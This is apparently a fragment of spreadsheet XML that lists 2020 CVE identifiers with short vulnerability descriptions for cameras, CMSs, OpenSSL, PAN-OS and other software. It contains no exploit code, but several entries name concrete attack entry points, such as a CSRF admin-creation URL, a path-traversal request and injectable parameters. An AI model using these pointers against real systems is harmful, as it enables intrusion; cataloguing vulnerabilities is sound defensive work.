  <si>
    <t>An issue was discovered in INSMA Wifi Mini Spy 1080P HD Security IP Camera 1.9.7 B. A local attacker can execute arbitrary code via editing the 'recdata.db' file to call a specially crafted GoAhead ASP-file on the SD card.</t>
  </si>
  <si>
    <t>CVE-2020-19643</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in INSMA Wifi Mini Spy 1080P HD Security IP Camera 1.9.7 B via all fields in the FTP settings page to the "goform/formSetFtpCfg" settings page.</t>
  </si>
  <si>
    <t>CVE-2020-19664</t>
  </si>
  <si>
    <t>DrayTek Vigor2960 1.5.1 allows remote command execution via shell metacharacters in a toLogin2FA action to mainfunction.cgi.</t>
  </si>
  <si>
    <t>CVE-2020-19667</t>
  </si>
  <si>
    <t>Stack-based buffer overflow and unconditional jump in ReadXPMImage in coders/xpm.c in ImageMagick 7.0.10-7.</t>
  </si>
  <si>
    <t>CVE-2020-19668</t>
  </si>
  <si>
    <t>Unverified indexs into the array lead to out of bound access in the gif_out_code function in fromgif.c in libsixel 1.8.6.</t>
  </si>
  <si>
    <t>CVE-2020-19669</t>
  </si>
  <si>
    <t>Cross Site Request Forgery (CSRF) vulnerability exists in Eyoucms 1.3.6 that can add an admin account via /login.php?m=admin&amp;c=Admin&amp;a=admin_add&amp;lang=cn.</t>
  </si>
  <si>
    <t>CVE-2020-1967</t>
  </si>
  <si>
    <t>Server or client applications that call the SSL_check_chain() function during or after a TLS 1.3 handshake may crash due to a NULL pointer dereference as a result of incorrect handling of the "signature_algorithms_cert" TLS extension. The crash occurs if an invalid or unrecognised signature algorithm is received from the peer. This could be exploited by a malicious peer in a Denial of Service attack. OpenSSL version 1.1.1d, 1.1.1e, and 1.1.1f are affected by this issue. This issue did not affect OpenSSL versions prior to 1.1.1d. Fixed in OpenSSL 1.1.1g (Affected 1.1.1d-1.1.1f).</t>
  </si>
  <si>
    <t>CVE-2020-19670</t>
  </si>
  <si>
    <t>In Niushop B2B2C Multi-Business Basic Edition V1.11, authentication can be bypassed, causing administrators to reset any passwords.</t>
  </si>
  <si>
    <t>CVE-2020-19672</t>
  </si>
  <si>
    <t>Niushop B2B2C Multi-business basic version V1.11, can bypass the administrator to obtain the background upload interface, through parameter upload, bypass the getimagesize function, upload php file, getshell.</t>
  </si>
  <si>
    <t>CVE-2020-19676</t>
  </si>
  <si>
    <t>Nacos 1.1.4 is affected by: Incorrect Access Control. An environment can be set up locally to get the service details interface. Then other Nacos service names can be accessed through the service list interface. Service details can then be accessed when not logged in. (detail:https://github.com/alibaba/nacos/issues/2284)</t>
  </si>
  <si>
    <t>CVE-2020-1968</t>
  </si>
  <si>
    <t>The Raccoon attack exploits a flaw in the TLS specification which can lead to an attacker being able to compute the pre-master secret in connections which have used a Diffie-Hellman (DH) based ciphersuite. In such a case this would result in the attacker being able to eavesdrop on all encrypted communications sent over that TLS connection. The attack can only be exploited if an implementation re-uses a DH secret across multiple TLS connections. Note that this issue only impacts DH ciphersuites and not ECDH ciphersuites. This issue affects OpenSSL 1.0.2 which is out of support and no longer receiving public updates. OpenSSL 1.1.1 is not vulnerable to this issue. Fixed in OpenSSL 1.0.2w (Affected 1.0.2-1.0.2v).</t>
  </si>
  <si>
    <t>CVE-2020-19682</t>
  </si>
  <si>
    <t>A Cross Site Request Forgery (CSRF) vulnerability exits in ZZZCMS V1.7.1 via the save_user funciton in save.php.</t>
  </si>
  <si>
    <t>CVE-2020-19683</t>
  </si>
  <si>
    <t>A Cross Site Scripting (XSS) exists in ZZZCMS V1.7.1 via an editfile action in save.php.</t>
  </si>
  <si>
    <t>CVE-2020-19703</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the referer parameter of Dzzoffice 2.02 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-19704</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability via ResourceController.java in spring-boot-admin as of 20190710 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-19705</t>
  </si>
  <si>
    <t>thinkphp-zcms as of 20190715 allows SQL injection via index.php?m=home&amp;c=message&amp;a=add.</t>
  </si>
  <si>
    <t>CVE-2020-19709</t>
  </si>
  <si>
    <t>Insufficient filtering of the tag parameters in feehicms 0.1.3 allows attackers to execute arbitrary web or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2020-1971</t>
  </si>
  <si>
    <t>The X.509 GeneralName type is a generic type for representing different types of names. One of those name types is known as EDIPartyName. OpenSSL provides a function GENERAL_NAME_cmp which compares different instances of a GENERAL_NAME to see if they are equal or not. This function behaves incorrectly when both GENERAL_NAMEs contain an EDIPARTYNAME. A NULL pointer dereference and a crash may occur leading to a possible denial of service attack. OpenSSL itself uses the GENERAL_NAME_cmp function for two purposes: 1) Comparing CRL distribution point names between an available CRL and a CRL distribution point embedded in an X509 certificate 2) When verifying that a timestamp response token signer matches the timestamp authority name (exposed via the API functions TS_RESP_verify_response and TS_RESP_verify_token) If an attacker can control both items being compared then that attacker could trigger a crash. For example if the attacker can trick a client or server into checking a malicious certificate against a malicious CRL then this may occur. Note that some applications automatically download CRLs based on a URL embedded in a certificate. This checking happens prior to the signatures on the certificate and CRL being verified. OpenSSL's s_server, s_client and verify tools have support for the "-crl_download" option which implements automatic CRL downloading and this attack has been demonstrated to work against those tools. Note that an unrelated bug means that affected versions of OpenSSL cannot parse or construct correct encodings of EDIPARTYNAME. However it is possible to construct a malformed EDIPARTYNAME that OpenSSL's parser will accept and hence trigger this attack. All OpenSSL 1.1.1 and 1.0.2 versions are affected by this issue. Other OpenSSL releases are out of support and have not been checked. Fixed in OpenSSL 1.1.1i (Affected 1.1.1-1.1.1h). Fixed in OpenSSL 1.0.2x (Affected 1.0.2-1.0.2w).</t>
  </si>
  <si>
    <t>CVE-2020-19716</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in the Databuf function in types.cpp of Exiv2 v0.27.1 leads to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-19717</t>
  </si>
  <si>
    <t>An unhandled memory allocation failure in Core/Ap48bdlAtom.cpp of Bento 1.5.1-628 causes a NULL pointer dereference, leading to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-19718</t>
  </si>
  <si>
    <t>An unhandled memory allocation failure in Core/Ap4Atom.cpp of Bento 1.5.1-628 causes a NULL pointer dereference, leading to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-19719</t>
  </si>
  <si>
    <t>A buffer overflow vulnerability in Ap4ElstAtom.cpp of Bento 1.5.1-628 leads to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-19720</t>
  </si>
  <si>
    <t>An unhandled memory allocation failure in Core/AP4IkmsAtom.cpp of Bento 1.5.1-628 causes a NULL pointer dereference, leading to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-19721</t>
  </si>
  <si>
    <t>A heap buffer overflow vulnerability in Ap4TrunAtom.cpp of Bento 1.5.1-628 may lead to an out-of-bounds write while running mp42aac, leading to system crashes and a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-19722</t>
  </si>
  <si>
    <t>An unhandled memory allocation failure in Core/Ap4Atom.cpp of Bento 1.5.1-628 causes a direct copy to NULL pointer dereference, leading to a denial of service (DOS).</t>
  </si>
  <si>
    <t>CVE-2020-1975</t>
  </si>
  <si>
    <t>Missing XML validation vulnerability in the PAN-OS web interface on Palo Alto Networks PAN-OS software allows authenticated users to inject arbitrary XML that results in privilege escalation. This issue affects PAN-OS 8.1 versions earlier than PAN-OS 8.1.12 and PAN-OS 9.0 versions earlier than PAN-OS 9.0.6. This issue does not affect PAN-OS 7.1, PAN-OS 8.0, or PAN-OS 9.1 or later versions.</t>
  </si>
  <si>
    <t>CVE-2020-19750</t>
  </si>
  <si>
    <t>An issue was discovered in gpac 0.8.0. The strdup function in box_code_base.c has a heap-based buffer over-read.</t>
  </si>
  <si>
    <t>CVE-2020-19751</t>
  </si>
  <si>
    <t>An issue was discovered in gpac 0.8.0. The gf_odf_del_ipmp_tool function in odf_code.c has a heap-based buffer over-read.</t>
  </si>
  <si>
    <t>CVE-2020-19752</t>
  </si>
  <si>
    <t>The find_color_or_error function in gifsicle 1.92 contains a NULL pointer dereference.</t>
  </si>
  <si>
    <t>CVE-2020-1976</t>
  </si>
  <si>
    <t>A denial-of-service (DoS) vulnerability in Palo Alto Networks GlobalProtect software running on Mac OS allows authenticated local users to cause the Mac OS kernel to hang or crash. This issue affects GlobalProtect 5.0.5 and earlier versions of GlobalProtect 5.0 on Mac OS.</t>
  </si>
  <si>
    <t>CVE-2020-19762</t>
  </si>
  <si>
    <t>Automated Logic Corporation (ALC) WebCTRL System 6.5 and prior allows remote attackers to execute any JavaScript code via a XSS payload for the first parameter in a GET request.</t>
  </si>
  <si>
    <t>CVE-2020-19765</t>
  </si>
  <si>
    <t>An issue in the noReentrance() modifier of the Ethereum-based contract Accounting 1.0 allows attackers to carry out a reentrancy attack.</t>
  </si>
  <si>
    <t>CVE-2020-19766</t>
  </si>
  <si>
    <t>The time check operation of PepeAuctionSale 1.0 can be rendered ineffective by assigning a large number to the _duration variable, compromising access control to the application.</t>
  </si>
  <si>
    <t>CVE-2020-19767</t>
  </si>
  <si>
    <t>A lack of target address verification in the destroycontract() function of 0xRACER 1.0 allows attackers to steal tokens from victim users via a crafted script.</t>
  </si>
  <si>
    <t>CVE-2020-19768</t>
  </si>
  <si>
    <t>A lack of target address verification in the selfdestructs() function of ICOVO 1.0 allows attackers to steal tokens from victim users via a crafted script.</t>
  </si>
  <si>
    <t>CVE-2020-19769</t>
  </si>
  <si>
    <t>A lack of target address verification in the BurnMe() function of Rob The Bank 1.0 allows attackers to steal tokens from victim users via a crafted script.</t>
  </si>
  <si>
    <t>CVE-2020-1977</t>
  </si>
  <si>
    <t>Insufficient Cross-Site Request Forgery (XSRF) protection on Expedition Migration Tool allows remote unauthenticated attackers to hijack the authentication of administrators and to perform actions on the Expedition Migration Tool. This issue affects Expedition Migration Tool 1.1.51 and earlier versions.</t>
  </si>
  <si>
    <t>CVE-2020-19770</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the system bulletin component of WUZHI CMS v4.1.0 allows attackers to steal the admin's cookie.</t>
  </si>
  <si>
    <t>CVE-2020-19778</t>
  </si>
  <si>
    <t>Incorrect Access Control in Shopxo v1.4.0 and v1.5.0 allows remote attackers to gain privileges in "/index.php" by manipulating the parameter "user_id" in the HTML request.</t>
  </si>
  <si>
    <t>CVE-2020-1978</t>
  </si>
  <si>
    <t>TechSupport files generated on Palo Alto Networks VM Series firewalls for Microsoft Azure platform configured with high availability (HA) inadvertently collect Azure dashboard service account credentials. These credentials are equivalent to the credentials associated with the Contributor role in Azure. A user with the credentials will be able to manage all the Azure resources in the subscription except for granting access to other resources. These credentials do not allow login access to the VMs themselves. This issue affects VM Series Plugin versions before 1.0.9 for PAN-OS 9.0. This issue does not affect VM Series in non-HA configurations or on other cloud platforms. It does not affect hardware firewall appliances. Since becoming aware of the issue, Palo Alto Networks has safely deleted all the tech support files with the credentials. We now filter and remove these credentials from all TechSupport files sent to us. The TechSupport files uploaded to Palo Alto Networks systems were only accessible by authorized personnel with valid Palo Alto Networks credentials. We do not have any evidence of malicious access or use of these credentials.</t>
  </si>
  <si>
    <t>CVE-2020-1979</t>
  </si>
  <si>
    <t>A format string vulnerability in the PAN-OS log daemon (logd) on Panorama allows a network based attacker with knowledge of registered firewall devices and access to Panorama management interfaces to execute arbitrary code, bypassing the restricted shell and escalating privileges. This issue affects only PAN-OS 8.1 versions earlier than PAN-OS 8.1.13 on Panorama. This issue does not affect PAN-OS 7.1, PAN-OS 9.0, or later PAN-OS versions.</t>
  </si>
  <si>
    <t>CVE-2020-1980</t>
  </si>
  <si>
    <t>A shell command injection vulnerability in the PAN-OS CLI allows a local authenticated user to escape the restricted shell and escalate privileges. This issue affects only PAN-OS 8.1 versions earlier than PAN-OS 8.1.13. This issue does not affect PAN-OS 7.1, PAN-OS 9.0, or later PAN-OS versions. This issue is fixed in PAN-OS 8.1.13, and all later versions.</t>
  </si>
  <si>
    <t>CVE-2020-1981</t>
  </si>
  <si>
    <t>A predictable temporary filename vulnerability in PAN-OS allows local privilege escalation. This issue allows a local attacker who bypassed the restricted shell to execute commands as a low privileged user and gain root access on the PAN-OS hardware or virtual appliance. This issue affects only PAN-OS 8.1 versions earlier than PAN-OS 8.1.13. This issue does not affect PAN-OS 7.1, PAN-OS 9.0, or later PAN-OS versions.</t>
  </si>
  <si>
    <t>CVE-2020-1982</t>
  </si>
  <si>
    <t>Certain communication between PAN-OS and cloud-delivered services inadvertently use TLS 1.0, which is known to be a cryptographically weak protocol. These cloud services include Cortex Data Lake, the Customer Support Portal, and the Prisma Access infrastructure. Conditions required for exploitation of known TLS 1.0 weaknesses do not exist for the communication between PAN-OS and cloud-delivered services. We do not believe that any communication is impacted as a result of known attacks against TLS 1.0. This issue impacts: All versions of PAN-OS 8.0; PAN-OS 8.1 versions earlier than PAN-OS 8.1.14; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 9.1 versions earlier than PAN-OS 9.1.3. PAN-OS 7.1 is not impacted by this issue.</t>
  </si>
  <si>
    <t>CVE-2020-19821</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in admin.php of DOYOCMS 2.3 allows attackers to execute arbitrary SQL commands via the orders[] parameter.</t>
  </si>
  <si>
    <t>CVE-2020-19822</t>
  </si>
  <si>
    <t>A remote code execution (RCE) vulnerability in template_user.php of ZZCMS version 2018 allows attackers to execute arbitrary PHP code via the "ml" and "title" parameters.</t>
  </si>
  <si>
    <t>CVE-2020-1983</t>
  </si>
  <si>
    <t>A use after free vulnerability in ip_reass() in ip_input.c of libslirp 4.2.0 and prior releases allows crafted packets to cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2020-1984</t>
  </si>
  <si>
    <t>Secdo tries to execute a script at a hardcoded path if present, which allows a local authenticated user with 'create folders or append data' access to the root of the OS disk (C:\) to gain system privileges if the path does not already exist or is writable. This issue affects all versions of Secdo for Windows.</t>
  </si>
  <si>
    <t>CVE-2020-1985</t>
  </si>
  <si>
    <t>Incorrect Default Permissions on C:\Programdata\Secdo\Logs folder in Secdo allows local authenticated users to overwrite system files and gain escalated privileges. This issue affects all versions Secdo for Windows.</t>
  </si>
  <si>
    <t>CVE-2020-19853</t>
  </si>
  <si>
    <t>BlueCMS v1.6 contains a SQL injection vulnerability via /ad_js.php.</t>
  </si>
  <si>
    <t>CVE-2020-19855</t>
  </si>
  <si>
    <t>phpwcms v1.9 contains a cross-site scripting (XSS) vulnerability in /image_zoom.php.</t>
  </si>
  <si>
    <t>CVE-2020-19858</t>
  </si>
  <si>
    <t>Platinum Upnp SDK through 1.2.0 has a directory traversal vulnerability. The attack could remote attack victim by sending http://ip:port/../privacy.avi URL to compromise a victim's privacy.</t>
  </si>
  <si>
    <t>CVE-2020-1986</t>
  </si>
  <si>
    <t>Improper input validation vulnerability in Secdo allows an authenticated local user with 'create folders or append data' access to the root of the OS disk (C:\) to cause a system crash on every login. This issue affects all versions Secdo for Windows.</t>
  </si>
  <si>
    <t>CVE-2020-19860</t>
  </si>
  <si>
    <t>When ldns version 1.7.1 verifies a zone file, the ldns_rr_new_frm_str_internal function has a heap out of bounds read vulnerability. An attacker can leak information on the heap by constructing a zone file payload.</t>
  </si>
  <si>
    <t>CVE-2020-19861</t>
  </si>
  <si>
    <t>When a zone file in ldns 1.7.1 is parsed, the function ldns_nsec3_salt_data is too trusted for the length value obtained from the zone file. When the memcpy is copied, the 0xfe - ldns_rdf_size(salt_rdf) byte data can be copied, causing heap overflow information leakage.</t>
  </si>
  <si>
    <t>CVE-2020-1987</t>
  </si>
  <si>
    <t>An information exposure vulnerability in the logging component of Palo Alto Networks Global Protect Agent allows a local authenticated user to read VPN cookie information when the troubleshooting logging level is set to "Dump". This issue affects Palo Alto Networks Global Protect Agent 5.0 versions prior to 5.0.9; 5.1 versions prior to 5.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-19877</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a directory traversal vulnerability as there is no directory control function in directory /dbhcms/. A remote unauthenticated attacker can exploit this vulnerability to obtain server-sensitive information.</t>
  </si>
  <si>
    <t>CVE-2020-19878</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a sensitive information leaks vulnerability as there is no security access control in /dbhcms/ext/news/ext.news.be.php, A remote unauthenticated attacker can exploit this vulnerability to get path information.</t>
  </si>
  <si>
    <t>CVE-2020-19879</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a stored xss vulnerability as there is no security filter of $_GET['dbhcms_pid'] variable in dbhcms\page.php line 107,</t>
  </si>
  <si>
    <t>CVE-2020-1988</t>
  </si>
  <si>
    <t>An unquoted search path vulnerability in the Windows release of Global Protect Agent allows an authenticated local user with file creation privileges on the root of the OS disk (C:\) or to Program Files directory to gain system privileges. This issue affects Palo Alto Networks GlobalProtect Agent 5.0 versions before 5.0.5; 4.1 versions before 4.1.13 on Windows;</t>
  </si>
  <si>
    <t>CVE-2020-19880</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a stored xss vulnerability as there is no htmlspecialchars function form 'Name' in dbhcms\types.php, A remote unauthenticated attacker can exploit this vulnerability to hijack other users.</t>
  </si>
  <si>
    <t>CVE-2020-19881</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a reflected xss vulnerability as there is no security filter in dbhcms\mod\mod.selector.php line 108 for $_GET['return_name'] parameter, A remote authenticated with admin user can exploit this vulnerability to hijack other users.</t>
  </si>
  <si>
    <t>CVE-2020-19882</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a stored xss vulnerability as there is no htmlspecialchars function for 'menu_description' variable in dbhcms\mod\mod.menus.edit.php line 83 and in dbhcms\mod\mod.menus.view.php line 111, A remote authenticated with admin user can exploit this vulnerability to hijack other users.</t>
  </si>
  <si>
    <t>CVE-2020-19883</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a stored xss vulnerability as there is no security filter in dbhcms\mod\mod.users.view.php line 57 for user_login, A remote authenticated with admin user can exploit this vulnerability to hijack other users.</t>
  </si>
  <si>
    <t>CVE-2020-19884</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a stored xss vulnerability as there is no htmlspecialchars function in dbhcms\mod\mod.domain.edit.php line 119.</t>
  </si>
  <si>
    <t>CVE-2020-19885</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a stored xss vulnerability as there is no htmlspecialchars function for '$_POST['pageparam_insert_name']' variable in dbhcms\mod\mod.page.edit.php line 227, A remote authenticated with admin user can exploit this vulnerability to hijack other users.</t>
  </si>
  <si>
    <t>CVE-2020-19886</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has no CSRF protection mechanism,as demonstrated by CSRF for an /index.php?dbhcms_pid=-80&amp;deletemenu=9 can delete any menu.</t>
  </si>
  <si>
    <t>CVE-2020-19887</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has a stored XSS vulnerability as there is no htmlspecialchars function for '$_POST['pageparam_insert_description']' variable in dbhcms\mod\mod.page.edit.php line 227, A remote authenticated with admin user can exploit this vulnerability to hijack other users.</t>
  </si>
  <si>
    <t>CVE-2020-19888</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has an unauthorized operation vulnerability because there's no access control at line 175 of dbhcms\page.php for empty cache operation. This vulnerability can be exploited to empty a table.</t>
  </si>
  <si>
    <t>CVE-2020-19889</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has no CSRF protection mechanism,as demonstrated by CSRF for index.php?dbhcms_pid=-70 can add a user.</t>
  </si>
  <si>
    <t>CVE-2020-1989</t>
  </si>
  <si>
    <t>An incorrect privilege assignment vulnerability when writing application-specific files in the Palo Alto Networks Global Protect Agent for Linux on ARM platform allows a local authenticated user to gain root privileges on the system. This issue affects Palo Alto Networks Global Protect Agent for Linux 5.0 versions before 5.0.8; 5.1 versions before 5.1.1.</t>
  </si>
  <si>
    <t>CVE-2020-19890</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has an Arbitrary file read vulnerability in dbhcms\mod\mod.editor.php $_GET['file'] is filename,and as there is no filter function for security, you can read any file's content.</t>
  </si>
  <si>
    <t>CVE-2020-19891</t>
  </si>
  <si>
    <t>DBHcms v1.2.0 has an Arbitrary file write vulnerability in dbhcms\mod\mod.editor.php $_POST['updatefile'] is filename and $_POST['tinymce_content'] is file content, there is no filter function for security. A remote authenticated admin user can exploit this vulnerability to get a webshell.</t>
  </si>
  <si>
    <t>CVE-2020-19896</t>
  </si>
  <si>
    <t>File inclusion vulnerability in Minicms v1.9 allows remote attackers to execute arbitary PHP code via post-edit.php.</t>
  </si>
  <si>
    <t>CVE-2020-19897</t>
  </si>
  <si>
    <t>A reflected Cross Site Scripting (XSS) in wuzhicms v4.1.0 allows remote attackers to execute arbitrary web script or HTML via the imgurl parameter.</t>
  </si>
  <si>
    <t>CVE-2020-1990</t>
  </si>
  <si>
    <t>A stack-based buffer overflow vulnerability in the management server component of PAN-OS allows an authenticated user to upload a corrupted PAN-OS configuration and potentially execute code with root privileges. This issue affects Palo Alto Networks PAN-OS 8.1 versions before 8.1.13; 9.0 versions before 9.0.7. This issue does not affect PAN-OS 7.1.</t>
  </si>
  <si>
    <t>CVE-2020-19907</t>
  </si>
  <si>
    <t>A command injection vulnerability in the sandcat plugin of Caldera 2.3.1 and earlier allows authenticated attackers to execute any command or service.</t>
  </si>
  <si>
    <t>CVE-2020-1991</t>
  </si>
  <si>
    <t>An insecure temporary file vulnerability in Palo Alto Networks Traps allows a local authenticated Windows user to escalate privileges or overwrite system files. This issue affects Palo Alto Networks Traps 5.0 versions before 5.0.8; 6.1 versions before 6.1.4 on Windows. This issue does not affect Cortex XDR 7.0. This issue does not affect Traps for Linux or MacOS.</t>
  </si>
  <si>
    <t>CVE-2020-19914</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in xiunobbs 4.0.4 allows remote attackers to execute arbitrary web script or HTML via the attachment upload function.</t>
  </si>
  <si>
    <t>CVE-2020-19915</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS vulnerability exists in WUZHI CMS 4.1.0 via the mailbox username in index.php.</t>
  </si>
  <si>
    <t>CVE-2020-1992</t>
  </si>
  <si>
    <t>A format string vulnerability in the Varrcvr daemon of PAN-OS on PA-7000 Series devices with a Log Forwarding Card (LFC) allows remote attackers to crash the daemon creating a denial of service condition or potentially execute code with root privileges. This issue affects Palo Alto Networks PAN-OS 9.0 versions before 9.0.7; PAN-OS 9.1 versions before 9.1.2 on PA-7000 Series devices with an LFC installed and configured. This issue requires WildFire services to be configured and enabled. This issue does not affect PAN-OS 8.1 and earlier releases. This issue does not affect any other PA Series firewalls.</t>
  </si>
  <si>
    <t>CVE-2020-19924</t>
  </si>
  <si>
    <t>In Boostnote 0.12.1, exporting to PDF contains opportunities for XSS attacks.</t>
  </si>
  <si>
    <t>CVE-2020-1993</t>
  </si>
  <si>
    <t>The GlobalProtect Portal feature in PAN-OS does not set a new session identifier after a successful user login, which allows session fixation attacks, if an attacker is able to control a user's session ID. This issue affects: All PAN-OS 7.1 and 8.0 versions; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.8.</t>
  </si>
  <si>
    <t>CVE-2020-1994</t>
  </si>
  <si>
    <t>A predictable temporary file vulnerability in PAN-OS allows a local authenticated user with shell access to corrupt arbitrary system files affecting the integrity of the system. This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.7.</t>
  </si>
  <si>
    <t>CVE-2020-19949</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the /link/add.html component of YzmCMS v5.3 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-1995</t>
  </si>
  <si>
    <t>A NULL pointer dereference vulnerability in Palo Alto Networks PAN-OS allows an authenticated administrator to send a request that causes the rasmgr daemon to crash. Repeated attempts to send this request result in denial of service to all PAN-OS services by restarting the device and putting it into maintenance mode. This issue affects: PAN-OS 9.1 versions earlier than 9.1.2.</t>
  </si>
  <si>
    <t>CVE-2020-19950</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in the /banner/add.html component of YzmCMS v5.3 allows attackers to execute arbitrary web scripts or HTML.</t>
  </si>
  <si>
    <t>CVE-2020-19951</t>
  </si>
  <si>
    <t>A cross-site request forgery (CSRF) in /controller/pay.class.php of YzmCMS v5.5 allows attackers to access sensitive components of the application.</t>
  </si>
  <si>
    <t>CVE-2020-19954</t>
  </si>
  <si>
    <t>An XML External Entity (XXE) vulnerability was discovered in /api/notify.php in S-CMS 3.0 which allows attackers to read arbitrary files.</t>
  </si>
  <si>
    <t>CVE-2020-19957</t>
  </si>
  <si>
    <t>A SQL injection vulnerability has been discovered in zz cms version 2019 which allows attackers to retrieve sensitive data via the id parameter on the /dl/dl_print.php page.</t>
  </si>
  <si>
    <t>CVE-2020-19959</t>
  </si>
  <si>
    <t>A SQL injection vulnerability has been discovered in zz cms version 2019 which allows attackers to retrieve sensitive data via the dlid parameter in the /dl/dl_sendmail.php page cookie.</t>
  </si>
  <si>
    <t>CVE-2020-1996</t>
  </si>
  <si>
    <t>A missing authorization vulnerability in the management server component of PAN-OS Panorama allows a remote unauthenticated user to inject messages into the management server ms.log file. This vulnerability can be leveraged to obfuscate an ongoing attack or fabricate log entries in the ms.log file This issue affects: All versions of PAN-OS 7.1 and 8.0; PAN-OS 8.1 versions earlier than 8.1.14; PAN-OS 9.0 versions earlier than 9.0.9.</t>
  </si>
  <si>
    <t>CVE-2020-19960</t>
  </si>
  <si>
    <t>A SQL injection vulnerability has been discovered in zz cms version 2019 which allows attackers to retrieve sensitive data via the dlid parameter in the /dl/dl_sendsms.php page cookie.</t>
  </si>
  <si>
    <t>CVE-2020-19961</t>
  </si>
  <si>
    <t>A SQL injection vulnerability has been discovered in zz cms version 2019 which allows attackers to retrieve sensitive data via the component subzs.php.</t>
  </si>
  <si>
    <t>CVE-2020-19962</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in the getClientIp function in /lib/tinwin.class.php of Chaoji CMS 2.39, allows attackers to execute arbitrary web scripts.</t>
  </si>
  <si>
    <t>CVE-2020-19964</t>
  </si>
  <si>
    <t>A Cross Site Request Forgery (CSRF) vulnerability was discovered in PHPMyWind 5.6 which allows attackers to create a new administrator account without authentication.</t>
  </si>
  <si>
    <t>CVE-2020-1997</t>
  </si>
  <si>
    <t>An open redirection vulnerability in the GlobalProtect component of Palo Alto Networks PAN-OS allows an attacker to specify an arbitrary redirection target away from the trusted GlobalProtect gateway. If the user then successfully authenticates it will cause them to access an unexpected and potentially malicious website. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.0 versions earlier than 8.0.14.</t>
  </si>
  <si>
    <t>CVE-2020-1998</t>
  </si>
  <si>
    <t>An improper authorization vulnerability in PAN-OS that mistakenly uses the permissions of local linux users instead of the intended SAML permissions of the account when the username is shared for the purposes of SSO authentication. This can result in authentication bypass and unintended resource access for the user. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; PAN-OS 9.1 versions earlier than 9.1.1; All versions of PAN-OS 8.0.</t>
  </si>
  <si>
    <t>CVE-2020-1999</t>
  </si>
  <si>
    <t>A vulnerability exists in the Palo Alto Network PAN-OS signature-based threat detection engine that allows an attacker to communicate with devices in the network in a way that is not analyzed for threats by sending data through specifically crafted TCP packets. This technique evades signature-based threat detection. This issue impacts: PAN-OS 8.1 versions earlier than 8.1.17; PAN-OS 9.0 versions earlier than 9.0.11; PAN-OS 9.1 versions earlier than 9.1.5; All versions of PAN-OS 7.1 and PAN-OS 8.0.</t>
  </si>
  <si>
    <t>CVE-2020-2000</t>
  </si>
  <si>
    <t>An OS command injection and memory corruption vulnerability in the PAN-OS management web interface that allows authenticated administrators to disrupt system processes and potentially execute arbitrary code and OS commands with root privileges. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.10; PAN-OS 9.1 versions earlier than PAN-OS 9.1.4; PAN-OS 10.0 versions earlier than PAN-OS 10.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-2001</t>
  </si>
  <si>
    <t>An external control of path and data vulnerability in the Palo Alto Networks PAN-OS Panorama XSLT processing logic that allows an unauthenticated user with network access to PAN-OS management interface to write attacker supplied file on the system and elevate privileges. This issue affects: All PAN-OS 7.1 Panorama and 8.0 Panorama versions; PAN-OS 8.1 versions earlier than 8.1.12 on Panorama; PAN-OS 9.0 versions earlier than 9.0.6 on Panorama.</t>
  </si>
  <si>
    <t>CVE-2020-2002</t>
  </si>
  <si>
    <t>An authentication bypass by spoofing vulnerability exists in the authentication daemon and User-ID components of Palo Alto Networks PAN-OS by failing to verify the integrity of the Kerberos key distribution center (KDC) before authenticating users. This affects all forms of authentication that use a Kerberos authentication profile. A man-in-the-middle type of attacker with the ability to intercept communication between PAN-OS and KDC can login to PAN-OS as an administrator. This issue affects: PAN-OS 7.1 versions earlier than 7.1.26; PAN-OS 8.1 versions earlier than 8.1.13; PAN-OS 9.0 versions earlier than 9.0.6; All version of PAN-OS 8.0.</t>
  </si>
  <si>
    <t>CVE-2020-2003</t>
  </si>
  <si>
